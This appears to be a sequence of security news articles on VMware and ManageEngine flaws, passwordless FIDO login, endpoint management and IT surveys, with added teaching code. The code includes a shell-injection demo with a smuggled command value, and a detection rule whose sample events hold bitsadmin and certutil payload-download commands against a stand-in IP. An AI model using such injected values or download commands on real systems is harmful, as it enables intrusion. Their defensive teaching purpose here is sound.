For the second time in less than a week, VMware is warning about a critical vulnerability (CVE-2020-4006). This time, the affected solutions are VMware Workspace One Access, Access Connector, VMware Identity Manager and VMware Identity Manager Connector.
As some of these are components of the VMware Cloud Foundation (vIDM) and vRealize Suite Lifecycle Manager (vIDM) product suites, those are impacted as well.
About the vulnerability (CVE-2020-4006)
Not much has been shared about CVE-2020-4006, except that it’s a command injection vulnerability that could allow a malicious actor with network access to the administrative configurator on port 8443 and a valid password for the configurator admin account to execute commands with unrestricted privileges on the underlying operating system.
The vulnerability was privately reported to VMware and the company categorized it as “critical.”
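VMware has published no detail beyond "command injection", so the snippet below is an added, hypothetical illustration of that bug class, not the configurator's code. It assumes a diagnostic helper that takes a hostname from an authenticated admin and hands it to a privileged tool (`echo` stands in for that tool so it runs anywhere), and shows the vulnerable shell-string form beside a hardened form that validates the input against an allow-list and passes argv as a list.

```python
import re
import subprocess

# Hypothetical helper written for this article; it is NOT VMware's configurator code.
# `echo` stands in for a privileged diagnostic the admin service would invoke.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def diag_vulnerable(host: str) -> str:
    """Vulnerable pattern: untrusted input is spliced into a shell command string.

    Any shell metacharacter in `host` (';', '|', '$(...)', backticks) is interpreted
    by the shell, so whoever can reach this endpoint with a valid admin password runs
    arbitrary commands with the privileges of the service, which is the impact
    VMware describes for CVE-2020-4006.
    """
    completed = subprocess.run(f"echo {host}", shell=True,
                               capture_output=True, text=True)
    return completed.stdout


def is_safe_argument(host: str) -> bool:
    """Allow-list check: only characters that can occur in a hostname."""
    return HOSTNAME_RE.fullmatch(host) is not None


def diag_hardened(host: str) -> str:
    """Hardened form: validate first, then pass argv as a list with shell=False.

    With shell=False the kernel receives argv directly; no shell ever parses the
    string, so metacharacters have no meaning, and the allow-list rejects anything
    that is not a plausible hostname before it is used at all.
    """
    if not is_safe_argument(host):
        raise ValueError(f"rejected input: {host!r}")
    completed = subprocess.run(["echo", host], shell=False,
                               capture_output=True, text=True, check=True)
    return completed.stdout


if __name__ == "__main__":
    benign = "vidm.example.internal"          # constructed sample input
    hostile = "x; echo INJECTED"              # constructed input with a shell separator
    print(diag_vulnerable(benign).strip())
    print(diag_vulnerable(hostile).strip())   # two lines: 'x' then 'INJECTED'
    print(diag_hardened(benign).strip())
    try:
        diag_hardened(hostile)
    except ValueError as exc:
        print("hardened helper:", exc)
```

The workaround VMware describes (disabling the port 8443 configurator) removes the reachable path to such code entirely, which is why configurator-managed changes stop working while it is in place; the patch is what fixes the underlying injection.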
Affected products include:
- VMware Workspace One Access v20.10 (Linux)
- VMware Workspace One Access v20.01 (Linux)
- VMware Identity Manager v3.3.3 (Linux)
- VMware Identity Manager v3.3.2 (Linux)
- VMware Identity Manager v3.3.1 (Linux)
- VMware Identity Manager Connector v3.3.2 and 3.3.1 (Linux)
- VMware Identity Manager Connector v3.3.3, 3.3.2, and 3.3.1 (Windows)
- VMware Cloud Foundation (vIDM) v4.x (running on any platform)
- vRealize Suite Lifecycle Manager (vIDM) v8.x (running on any platform)
VMware did not say whether the flaw is under active exploitation, but they released workarounds (and instructions on how to remove them) as they are working on the patches.
“This workaround is relevant for the configurator hosted on port 8443. Impacts are limited to functionality performed by this service. Configurator-managed setting changes will not be possible while the workaround is in place. If changes are required please revert the workaround following the instructions below, make the required changes and disable again until patches are available. In addition, most of the system diagnostics dashboard will not be displayed,” the company noted.
Last week, VMware patched critical flaws in its ESXi hypervisor that were exploited during the Tianfu Cup Pwn Contest that was held in Chengdu, China, earlier this month.
COVID-19 and the subsequent global recession have thrown a wrench into IT spending. Many enterprises have placed new purchases on hold. Gartner recently projected that global spending on IT would drop 8% overall this year — and yet dollars allocated to cloud-based services are still expected to rise by approximately 19 percent, bucking that downward trend.
Underscoring the relative health of the cloud market, IDC reported that all growth in traditional tech spending will be driven by four platforms over the next five years: cloud, mobile, social and big data/analytics. Their 2020-2023 forecast states that traditional software continues to represent a major contribution to productivity, while investments in mobile and cloud hardware have created new platforms which will enable the rapid deployment of new software tools and applications.
With entire workforces suddenly going remote all over the world, there certainly are a number of specific business problems that need to be addressed, and many of the big issues involve VPNs.
Assault on VPNs
Millions of employees are working from home, and they all have to securely access their corporate networks. The vast majority of enterprises still rely on on-premises servers to some degree (estimates range from 60% to 98%), therefore VPNs play a vital role in enabling that employee connection to the network. This comes at a cost, though: bandwidth is gobbled up, slowing network performance — sometimes to a crippling level — and this has repercussions.
Maintenance of the thousands of machines and devices connected to the network gets sacrificed. The deployment of software, updates and patches simply doesn’t happen with the same regularity as when everyone works on-site. One reason for this is that content distribution (patches, applications and other updates) can take up much-needed bandwidth, and as a result, system hygiene gets sacrificed for the sake of keeping employees productive.
Putting off endpoint management, however, exposes corporate networks to enormous risks. Bad actors are well aware that endpoints are not being maintained at the same level as pre-pandemic, and they are more than willing to take advantage. Recent stats show that the volume of cyberattacks today is pretty staggering — much higher than prior to COVID-19.
Get thee to the cloud: Acceleration of modern device management
Because of bandwidth concerns, the pressure to trim costs, and the need to maintain machines in new ways, many enterprises are accelerating their move to the cloud. The cloud offers a lot of advantages for distributed workforces while also reducing costs. But digital transformation and the move to modern device management can’t happen overnight.
Enterprises have invested too much time, money, physical space and human resources to just walk away. Not to mention, on-premises environments have been highly reliable. Physical servers are one of the few things IT teams can count on to just work as intended these days.
Hybrid environments offer a happy medium. With the latest technology, enterprises can begin migrating to the cloud and adapt to changing conditions, meeting the needs of distributed teams. They can also save some money in the process. At the same time, they don’t have to completely abandon their tried-and-true servers.
Solving specific business problems: Content distribution to keep systems running
But what about those “specific business problems,” such as endpoint management and content distribution? Prior to COVID-19, this had been one of the biggest hurdles to digital transformation. It was not possible to distribute software and updates at scale without negatively impacting business processes and without excessive cost.
The issue escalated with the shift to remote work. Fortunately, technology providers have responded, developing solutions that leverage secure and efficient delivery mechanisms, such as peer-to-peer content distribution, that can work in the cloud. Even in legacy environments, vast improvements have been made to reduce bandwidth consumption.
These solutions allow enterprises to transition from a traditional on-premises infrastructure to the cloud and modern device management at their own speed, making their company more agile and resilient to the numerous risks they encounter today. Breakthrough technologies also support multiple system management platforms and help guarantee endpoints stay secure and updated even if corporate networks go down – something that, given the world we live in today, is a very real possibility.
Companies like Garmin and organizations such as the University of California San Francisco joined the unwitting victims of ransomware attacks in recent months. Their systems were seized, only to be released upon payment of millions of dollars.
While there is the obvious hard cost involved, there are severe operational costs as well — employees that can’t get on the network to do their jobs, systems must be scanned, updated and remediated to ensure the network isn’t further compromised, etc. A lot has to happen within a short period of time in the wake of a cyberattack to get people back to work as quickly and safely as possible.
Fortunately, with modern cloud-based content distribution solutions, all that is needed for systems to stay up is electricity and an internet connection. Massive redundancy is being built into the design of products to provide extreme resilience and help ensure business continuity in case part or all of the corporate network goes down.
The newest highly scalable, cloud-enabled content distribution options enable integration with products like Azure CDN and Azure Storage and also provide a single agent for migration to modern device management. With features like cloud integration, internet P2P, and predictive bandwidth harvesting, enterprises can leverage a massive amount of bandwidth from the internet to manage endpoints and ensure they always stay updated and secure.
Given these new developments precipitated and accelerated by COVID-19, as well as the clear, essential business problem these solutions address, expect to see movement and growth in the cloud sector. Expect to see an acceleration of modern device management, and despite IT spending cuts, expect to see a better, more secure and reliable, cost efficient, operationally efficient enterprise in the days to come.
The story of digital authentication started in an MIT lab in 1961, when a group of computer scientists got together and devised the concept of passwords. Little did they know the anguish it would cause over the next 50 years. Today, most people possess more than 90 username-and-password combinations and would rather click “Reset password” than try to remember them all.
Unfortunately, passwords are not only inconvenient, but dangerous as well – it’s a problem the world has been grappling with for the last 20 years, at least. Somewhere in the background, though, the authentication wheel has been turning and recently, at the Apple Worldwide Developer Conference (WWDC), two promising announcements were made.
But first, let’s backtrack a bit…
Everybody loves pizza
Authentication has evolved in several interesting ways. Two-factor authentication, for example, was developed in response to account takeover fraud – and it had its place. But when people started doubling up on the knowledge factor, we started seeing instances of knowledge-based authentication where, if you forgot your password, you could enter your mother’s maiden name, the title of your favorite book or your favorite food. Attackers could still succeed by guessing because, as it turns out, most people like pizza!
What if those scientists had started out differently and looked more closely at how other valuables were being protected?
House and car keys, for example, still represent strong possession factors that grant access to high-value assets. They’ve been used for ages with great success and, as a result, make the concept of possession as a primary factor easy for users to understand: “keep your keys safe, it grants you access.” There was never a need to add an extra layer of authentication.
Fast-forward to the digital era, and car keys have evolved to enable keyless entry. Houses, too, are commonly accessed with a remote. In both cases, unique challenge-response mechanisms are used for every transaction, making them impossible to intercept or copy.
Which brings me back to the first of two Apple announcements mentioned earlier.
Where physical meets digital
After much experimenting with identification and endpoints, the iPhone can now act as a car key. Though Apple devices are protected by biometrics and PINs, isn’t it ironic that after all this time, the iPhone – in all its sophisticated glory – has become like a physical key in a sense?
Had that MIT team been able to use an uncopiable “digital key,” perhaps today’s digital world would not be littered with billions of passwords, and attackers would have had to physically approach their victims to steal their keys. That would have cost money and exposed them to capture, making attacks much more costly and risky when compared to attacks that are carried out by sending out thousands of phishing emails at a time.
Of course, there have been several attempts to come up with alternatives. Many dedicated hardware devices have been used over the years with varying degrees of success, but no-one has ever hit the nail on the head.
Some companies allocated a number but did not generate it themselves. Instead, they used a number found or calculated on the device (like the phone’s IMEI or browser fingerprinting), breaking the challenge-response paradigm and nullifying the isolation principle. Others issued physical hardware (like keys) that created cost and distribution challenges, not to mention them being yet another thing for users to carry around.
A vision of endpoint perfection
Companies entering this space need to recognize the value of secure endpoints and find a solution that will:
- Ensure that each endpoint instance is allocated a unique, once-off value
- Ensure that each challenge-response mechanism is unique every time
- Limit the “key” to a single use and have a unique “key” for each mobile app
- Have the ability to issue new keys for each new use case and make the linking easy
- Have the ability to issue keys to devices that users already have in their possession
This can result in stable endpoints. Though certain requirements may force a business to include passwords here and there, the endpoint always needs to be the anchor.
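As an added example (not from the article or any vendor it mentions), here is a minimal model of the possession-factor requirements listed above: a unique once-off key per device and per app, a fresh random challenge for every transaction, and a response that is accepted exactly once. It uses a keyed HMAC from the Python standard library so it runs offline; a FIDO authenticator does the same job with a per-site key pair and a signature, so that the server holds only a public key, and that difference is the one thing this simplification hides.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field


def _respond(key: bytes, rp_name: str, app_id: str, challenge: bytes) -> bytes:
    # Binding the relying party and app id into the MAC keeps a response captured
    # in one context from being replayed against another. (Assumed scheme for this
    # example; real FIDO signs the challenge with a per-site private key instead.)
    msg = rp_name.encode() + b"|" + app_id.encode() + b"|" + challenge
    return hmac.new(key, msg, hashlib.sha256).digest()


@dataclass
class RelyingParty:
    """Server side: one key per (device, app) pair plus the challenges still open."""
    name: str
    keys: dict = field(default_factory=dict)      # (device_id, app_id) -> key
    pending: set = field(default_factory=set)     # issued, not yet consumed

    def enroll(self, device_id: str, app_id: str, key: bytes) -> None:
        # Each endpoint instance gets a unique, once-off value scoped to one app;
        # re-enrolment must issue a fresh key rather than reuse the old one.
        if (device_id, app_id) in self.keys:
            raise ValueError("already enrolled; issue a new key instead")
        self.keys[(device_id, app_id)] = key

    def challenge(self) -> bytes:
        c = secrets.token_bytes(32)   # fresh per transaction, never reused
        self.pending.add(c)
        return c

    def verify(self, device_id: str, app_id: str, challenge: bytes, response: bytes) -> bool:
        if challenge not in self.pending:
            return False              # unknown or already-used challenge: replay
        self.pending.discard(challenge)   # single use, consumed even if the response is bad
        key = self.keys.get((device_id, app_id))
        if key is None:
            return False
        expected = _respond(key, self.name, app_id, challenge)
        return hmac.compare_digest(expected, response)


@dataclass
class Authenticator:
    """Device side: keys are generated here and never leave; only responses do."""
    device_id: str
    keys: dict = field(default_factory=dict)      # app_id -> key

    def enroll(self, rp: RelyingParty, app_id: str) -> None:
        key = secrets.token_bytes(32)             # unique per app on this device
        self.keys[app_id] = key
        rp.enroll(self.device_id, app_id, key)

    def respond(self, rp: RelyingParty, app_id: str, challenge: bytes) -> bytes:
        return _respond(self.keys[app_id], rp.name, app_id, challenge)


def demo() -> dict:
    """Walks through a fresh login, a replay, and a cross-app reuse attempt."""
    rp = RelyingParty("bank.example")             # constructed relying party name
    phone = Authenticator("phone-1")
    phone.enroll(rp, "banking-app")
    phone.enroll(rp, "loyalty-app")
    results = {}
    c1 = rp.challenge()
    r1 = phone.respond(rp, "banking-app", c1)
    results["fresh_ok"] = rp.verify("phone-1", "banking-app", c1, r1)
    # The same captured response presented again must fail: the challenge is spent.
    results["replay_rejected"] = not rp.verify("phone-1", "banking-app", c1, r1)
    # A response produced for the loyalty app does not unlock the banking app.
    c2 = rp.challenge()
    r_other = phone.respond(rp, "loyalty-app", c2)
    results["cross_app_rejected"] = not rp.verify("phone-1", "banking-app", c2, r_other)
    return results


if __name__ == "__main__":
    print(demo())   # {'fresh_ok': True, 'replay_rejected': True, 'cross_app_rejected': True}
```

The server-side `pending` set is what turns "unique every time" into an enforced property rather than a hope: a challenge that has been answered (or merely attempted) is gone, so an intercepted response has no second use, which is the property the keyless-entry comparison above relies on.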
When looking at companies that applied the security principles mentioned above, many arrived at similar solutions. The FIDO Alliance, for example, launched eight years ago to tackle the world’s over-reliance on passwords. They chose to focus mainly on protecting website logins. However, there are ways that businesses can obtain certifications and become FIDO compliant.
Android announced that FIDO would be built into their devices. Microsoft then followed suit, adding it to their authentication setup in Windows (Windows Hello). Only one dominant player remained – Apple – and they were silent. Then, suddenly, with iOS 13.3, Safari started supporting external FIDO tokens. So, when Apple joined the FIDO Alliance in February this year, many were already anticipating a WWDC unveiling – yes, the second announcement.
Now, the endpoint puzzle is finally complete and later this year, all major desktop (Windows and macOS) and mobile (iOS and Android) operating systems will feature built-in FIDO authenticators operating as secure endpoints.
Trusted endpoints: Where we need to be
The vision of trusted endpoints is becoming a reality and finally, context-specific identities can be provisioned into most consumer devices. Consumers can now trust in a physical device, not in some digital thing that can easily be lost or forgotten.
To succeed, attackers will need to gain access to the physical device, which is not easily done.
Of course, there are many challenges we still need to tackle. However, they pale in comparison to the potential that now exists to create exciting new customer journeys using a universal platform authenticator.
Vulnerability management (VM) technology addresses the threat landscape, which is in a constant state of flux. The wider dispersal of endpoints across private and public cloud environments increases the points of vulnerabilities in an enterprise network, intensifying the demand for VM solutions that make endpoints easier to track, verify, and secure.
To prevent attacks and damage to a business, VM providers employ various means of identifying, prioritizing, communicating, and suggesting possible responses to the risks companies face in their networked business environments.
The leading VM platforms provide a complete picture of a client’s security posture, correlating the client organization’s assets, classifying their importance with the vulnerabilities identified in the scan, and offering information for remediation.
A multilayered defense
Frost & Sullivan’s latest thought leadership paper analyzes the threat landscape and the role of VM in addressing the security concerns of the entire enterprise. It analyzes end-user willingness to invest in VM platforms that help provide a holistic cybersecurity approach in various areas, including vulnerability prioritization, automated workflows, and third-party integration.
“This aids a multilayered defense, which has proven to be superior to discrete technologies working separately in network defense. VM platforms that allow IT departments to conduct continual vulnerability assessments are emerging as one of the top five solutions for organizations concerned about system vulnerabilities as part of their security maturity improvement initiatives.”
According to the research, two out of every three cyberattacks in the United States and three out of every four in Europe are categorized as severe by the organizations affected by them.
Kaseya announced the results of its sixth annual IT operations benchmark report, consisting of two distinct survey audiences: IT practitioners (the IT managers and technicians working daily with technology) and IT leaders (IT directors and above).
The study surveyed 878 SMB respondents, 543 of whom were IT practitioners and 335 were IT leaders. The differences in priorities and concerns between the two audiences understandably center around aspects of their roles impacted most by COVID-19: IT leaders are currently more focused on maintaining operations while keeping IT budgets in check, whereas one of IT practitioners’ greatest struggles is maintaining productivity using limited resources.
However, many similarities also emerged for both groups, including an emphasis on IT security, data protection and the interplay between automation and productivity in 2020.
Improving security is a top priority
Although 63% of IT practitioners said they had not experienced a security breach or ransomware attack in the past three years, the increase in cyberattacks during the pandemic has cemented cybersecurity and data protection as a top priority for both groups.
More than half of IT practitioners and 60% of IT leaders listed “improving IT security” as their top priority in 2020, and more than half of respondents from both groups named “cybersecurity and data protection” as their top challenge.
But managing and working with limited budgets makes securing their company during this time difficult for IT teams. Although 73% of IT leaders are optimistic that their IT budgets will remain the same or increase in 2021, nearly one-third are still concerned about having inadequate IT budgets or resources to meet demands — a similar consideration for 32% of practitioners.
As a result of limited budgets, less than a third of practitioners are actually able to patch remote, off-network devices. This potentially exposes the entire company’s networks to higher security risks given the increase in remote workforces using personal devices or connecting to unsecured Wi-Fi connections during the pandemic.
Investing in IT automation improves productivity and reduces costs
In addition to potentially making companies vulnerable to security risks, slashed budgets can also impact an IT team’s productivity. Luckily, both IT practitioners and leaders are on the same page about the solution to this problem in 2020: automation.
IT practitioners who listed “increasing IT productivity through automation” and IT leaders who named “reducing IT costs” are simply pursuing the same goal, since higher productivity ultimately reduces operating costs.
When asked about the technologies IT leaders are planning to invest in for 2021, 60% said “IT automation.” Likewise, 38% of practitioners named “automation of IT processes” as a top use case for their endpoint management solution.
Endpoint protection has evolved to safeguard from complex malware and evolving zero-day threats.
To select an appropriate endpoint protection solution for your business, you need to think about a variety of factors. We’ve talked to several cybersecurity professionals to get their insight on the topic.
Theresa Lanowitz, Head of Evangelism, AT&T Cybersecurity
Corporate endpoints represent a top area of security risk for organizations, especially considering the shift to virtual operations brought on by COVID-19. As malicious actors target endpoints with new types of attacks designed to evade traditional endpoint prevention tools, organizations must seek out advanced endpoint detection and response (EDR) solutions.
Traditionally, enterprise EDR solutions carry high cost and complexity, making it difficult for organizations to implement EDR successfully. While many security teams recognize the need for EDR, most do not have the resources to manage a standalone endpoint security solution.
For this reason, when selecting an EDR solution, it’s critical to seek a unified solution for threat detection, incident response and compliance, to be incorporated into an organization’s existing security stack, eliminating any added cost or complexity. Look for endpoint solutions where security teams can deploy a single platform that delivers advanced EDR combined with many other essential security capabilities in a single pane of glass, in an effort to drive efficiency of security and network operations.
Overall, organizations should select an EDR solution that enables security teams to detect and respond to threats faster while eliminating the cost and complexity of maintaining yet another point security solution. This approach can help organizations bolster their cybersecurity and network resiliency, with an eye towards securing the various endpoints used in today’s virtual workforce.
Rick McElroy, Cyber Security Strategist, VMware Carbon Black
With the continuously evolving threat landscape, there are a number of factors to consider during the selection process. Whether a security team is looking to replace antiquated malware prevention or empower a fully-automated security operations process, here are the key considerations:
- Does the platform have the flexibility for your environment? Not all endpoints are the same, therefore broad coverage of operating systems is a must.
- Does the vendor support the MITRE ATT&CK Framework for both testing and maturing the product? Organizations need to test security techniques, validate coverage and identify gaps in their environments, and implement mitigation to reduce attack surface.
- Does it provide deeper visibility into attacks than traditional antivirus? Organizations need deeper context to make a prevention, detection or response decision.
- Does the platform provide multiple security functionality in one lightweight sensor? Compute is expensive, endpoint security tools should be as non-impactful to the system as possible.
- Is the platform usable at scale? If your endpoint protection platform isn’t centrally analyzing behaviors across millions of endpoints, it won’t be able to spot minor fluctuations in normal activity to reveal attacks.
- Does the vendor’s roadmap meet the future needs of the organization? Any tool selected should allow teams the opportunity for growth and ability to use it for multiple years, building automated processes around it.
- Does the platform have open APIs? Teams want to integrate endpoints with SIEM, SOAR platforms and network security systems.
David Ngo, VP Metallic Products and Engineering, Commvault
With millions working remotely due to COVID-19, laptop endpoints being used by employees while they work from home are particularly vulnerable to data loss.
This has made it more important than ever for businesses to select a strong endpoint protection solution that:
- Lowers the risk of lost data. The best solutions have automated backups that run multiple times during the day to ensure recent data is protected and security features such as geolocation and remote wipe for lost or stolen laptops. Backup data isolation from source data can also provide an extra layer of protection from ransomware. In addition, anomaly detection capabilities can identify abnormal file access patterns that indicate an attack.
- Enables rapid recovery. If an endpoint is compromised, the solution should accelerate data recovery by offering metadata search for quick identification of backup data. It’s also important for the solution to provide multiple granular restore options – including point in time, out of place, and cross OS restores – to meet different recovery needs.
- Limits user and IT staff administration burdens. Endpoint solutions with silent install and backup capabilities require no action from end users and do not impact their productivity. The solution should also allow users and staff to access backup data, anytime, anywhere, from a browser-enabled device, and make it possible for employees to search and restore files themselves.
James Yeager, VP of Public Sector, CrowdStrike
Decision-makers seeking the best endpoint protection (EPP) solution for their business should be warned that legacy security solutions are generally ineffective, leaving organizations highly susceptible to breaches and placing a huge burden on security teams and users.
Legacy tools, engineered by on-premises architectures, are unable to keep up with the capabilities made available in a modern EPP solution, like collecting data in real-time, storing it for long periods and analyzing it in a timely manner. Storing threat telemetry data in the cloud makes it possible to quickly search petabytes of data in an effort to glean historical context for activities running on any managed system.
Beware of retrofitted systems from vendors advertising newer “cloud-enabled” features. Simply put, these “bolt-on” models are unable to match the performance of a cloud-native solution. Buyers run the risk of their security program becoming outdated with tools that cannot scale to meet the growing needs of today’s modern, distributed workforce.
Furthermore, comprehensive visibility into the threat landscape and overall IT hygiene of your enterprise are foundational for efficient security. Implementing cloud-native endpoint detection and response (EDR) capabilities into your security stack that leverage machine learning will deliver visibility and detection for threat protection across the entire kill chain. Additionally, a “hygiene first” approach will help you identify the most critical risk areas early on in the threat cycle.
1E has unveiled the findings of an analysis, conducted during the coronavirus pandemic, of the remote employee experience and the digital workplace in 2020.
Vanson Bourne and 1E surveyed employees across eight industries in the United States and found that enterprise IT teams are failing to deliver a positive remote employee experience. Data shows IT has more to do in order to prepare their organizations—and employees—for a work from anywhere enterprise in the aftermath of the coronavirus pandemic.
“Never before have we had this level of insight about the experience employees have with their devices—and IT generally—in the post-COVID world. In the work from anywhere enterprise, endpoint management tools are the central nervous system because the endpoint is no longer just a device.
“Endpoints have now become much more personal and integral to the lives of all employees, enabling them to stay connected and work. This research helps businesses understand the new digital employee experience and reimagine the traditional definition of the workplace,” says Sumir Karayi, CEO at 1E.
46m Americans are now totally dependent on their laptop
At its heart, the digital work from anywhere enterprise is about putting people first and serving their needs wherever they choose to work, but the data from the research indicates that IT teams, along with over-burdened and ill-equipped service desks, are struggling to meet the needs of newly remote employees.
Since the start of the pandemic, 46m people have moved from working in the office on a full-time basis to working from home full-time. That’s a significant amount of people forced into new ways of working overnight and who are totally reliant on their laptop for work and communication.
“IT must be able to understand and optimize the employee’s world through the endpoint. But what the research shows is that the speed of change has left legacy IT tools ineffective in their management of remote endpoints and the digital employee experience.
“This research proves that legacy tools must be replaced with a new generation of endpoint management solutions designed to cope with the complexities of the work from anywhere enterprise; they need to be real-time, autonomic, and scalable,” Karayi concludes.
US employees take huge productivity hit when working remotely
98% of US knowledge workers said that device performance is critical to their ability to work remotely but 36m (53%) reported that their device performs slower outside the office and 33m (48%) flagged it as a top three issue that hinders their productivity and overall employee experience.
25m employees (37%) are also experiencing more issues working remotely, and those issues are taking much longer to resolve. 49m employees (72%) are reporting that it takes days and weeks to get issues fixed. Yet more worryingly, 50m employees (74%) experience repeat issues.
But when issues are resolved, 46m employees (68%) are disrupted by the service desk, with only 21m (31%) of employees able to continue their work during the process. Shockingly, 18m employees (26%) said they couldn’t work at all when an issue is being fixed. Needless to say, 50m (74% of employees) are feeling less connected than ever to their colleagues.
“Too often we only ask IT about IT issues. What’s refreshing about this research is that employees took part and were asked how they’re coping in this new normal. The data shows how critical endpoint automation is so employees can just get their work done,” says Paul Hardy, Evangelist, Chief Innovation Office, at ServiceNow.
“The fact that 74% of employees are facing repeat issues proves that a lack of automation doesn’t just impact the employee experience, but further burdens the service desk and holds organizations back from creating meaningful value and growth,” comments Hardy.
“The reality is that COVID has ripped up the enterprise IT book, and it’s time to use research such as this to rewrite the norm.”
The work from anywhere enterprise and the remote employee experience beyond 2020
As well as the employee experience, the research has also found other issues for IT to deal with on the journey to a work from anywhere enterprise.
Most damaging are security (50m, or 73% of respondents, aren’t concerned about their corporate device being hacked when working remotely) and software provisioning (24m, or 35% of respondents, don’t have all the software they need to work from home effectively).
Is your organization using ManageEngine Desktop Central? If the answer is yes, make sure you’ve upgraded to version 10.0.474 or risk falling prey to attackers who are actively exploiting a recently disclosed RCE flaw (CVE-2020-10189) in its software.
We’re seeing this being exploited in the wild. Watch for shady shit dropping out of java.exe, LOLBIN download of 2nd stage via bitsadmin or certutil
Working on a blog post, watch https://t.co/yI3VuU1IIa
— Eric Capuano (@eric_capuano) March 10, 2020
— chris doman (@chrisdoman) March 9, 2020
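The parent/child pattern in the tweet above (something spawned by the Desktop Central java.exe that fetches a second stage with bitsadmin or certutil) translates directly into a process-creation detection. The following is an added example, not from the article or the researchers quoted: it runs that rule over a handful of constructed Sysmon-style events, including benign look-alikes that the rule must not flag. Field names follow Sysmon Event ID 1; every value is made up.

```python
import ntpath
import re

# Constructed process-creation events. Field names mirror Sysmon Event ID 1; hosts,
# paths, and the 203.0.113.0/24 documentation address are all made up for this example.
SAMPLE_EVENTS = [
    {"id": 1, "host": "DC-SRV01",
     "ParentImage": r"C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c bitsadmin /transfer job1 http://203.0.113.10/s.bin C:\Windows\Temp\s.bin"},
    {"id": 2, "host": "DC-SRV01",
     "ParentImage": r"C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.10/a.txt C:\Windows\Temp\a.txt"},
    {"id": 3, "host": "DC-SRV01",   # benign: certutil used to hash a file, no download flags
     "ParentImage": r"C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -hashfile C:\ManageEngine\repo\patch.msi SHA256"},
    {"id": 4, "host": "WS-042",     # benign for this rule: a BITS transfer not under java.exe
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer upd http://updates.example.internal/p.cab C:\tmp\p.cab"},
    {"id": 5, "host": "DC-SRV01",   # benign: ordinary child process of the server
     "ParentImage": r"C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c dir C:\ManageEngine\logs"},
]

# Download-capable invocations of the two LOLBINs named in the tweet. Matching on the
# command line rather than the Image field catches the tool even when cmd.exe wraps it.
DOWNLOAD_CRADLES = [
    ("bitsadmin download", re.compile(r"\bbitsadmin(?:\.exe)?\b.*/(?:transfer|addfile)\b", re.I)),
    ("certutil download",  re.compile(r"\bcertutil(?:\.exe)?\b.*-(?:urlcache|verifyctl)\b", re.I)),
]


def is_suspicious(event: dict):
    """Return a reason string if the event matches the rule, else None."""
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    if parent != "java.exe":
        return None          # the rule is scoped to children of the Java server process
    cmd = event.get("CommandLine", "")
    for label, pattern in DOWNLOAD_CRADLES:
        if pattern.search(cmd):
            return label
    return None


def detect(events):
    """Apply the rule to a batch of events and return alert records."""
    alerts = []
    for ev in events:
        label = is_suspicious(ev)
        if label:
            alerts.append({"id": ev["id"], "host": ev["host"],
                           "reason": f"{label} spawned under java.exe",
                           "cmd": ev["CommandLine"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):   # flags events 1 and 2 only
        print(alert["host"], alert["reason"], "::", alert["cmd"])
```

In production the parent check should be narrowed further to the Desktop Central install path (the `jre\bin\java.exe` under the server directory), since a bare `java.exe` parent is common on application servers; the download-flag patterns are the part that keeps legitimate certutil and BITS usage out of the alert queue.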
About ManageEngine Desktop Central
ManageEngine Desktop Central is developed by ManageEngine, a division of Zoho Corporation, a software development company that focuses on web-based business tools and information technology.
Desktop Central is a unified endpoint management solution that helps companies, including managed service providers (MSPs), to centrally control servers, laptops, smartphones, and tablets.
About the vulnerability (CVE-2020-10189)
CVE-2020-10189 is a deserialization-of-untrusted-data flaw that allows unauthenticated, remote attackers to execute arbitrary code on affected installations of ManageEngine Desktop Central and achieve SYSTEM/root privileges.
This would allow them to install malicious programs or push malicious updates onto the managed devices, lock them, and so on.
The vulnerability affects Desktop Central versions prior to 10.0.474 and was unearthed by Steven Seeley of Source Incite, who revealed its existence publicly last week through a tweet and security advisory that also links to PoC exploit code.
At the time, the vulnerability was a zero-day (unknown to and unaddressed by the vendor), since Seeley didn’t share his findings with Zoho/ManageEngine prior to the advisory’s publication – ostensibly because “Zoho typically ignores researchers.”
A day later ManageEngine issued a security update (v10.0.479) to correct the flaw and offered mitigation advice.
Nate Warfield, senior security program manager at Microsoft, used the Shodan search engine to find some 2,300 publicly accessible Desktop Central instances.
But even instances that aren’t exposed externally can be exploited by attackers who have gained access to the target organization’s network through another security hole, allowing them to broaden their presence.
Finally, since the solution is often used by managed service providers (MSPs), compromised Desktop Central instances could result in the simultaneous compromise of many client organizations’ endpoints and, through them, networks.
Organizations that use ManageEngine Desktop Central should upgrade to a safe version as soon as possible.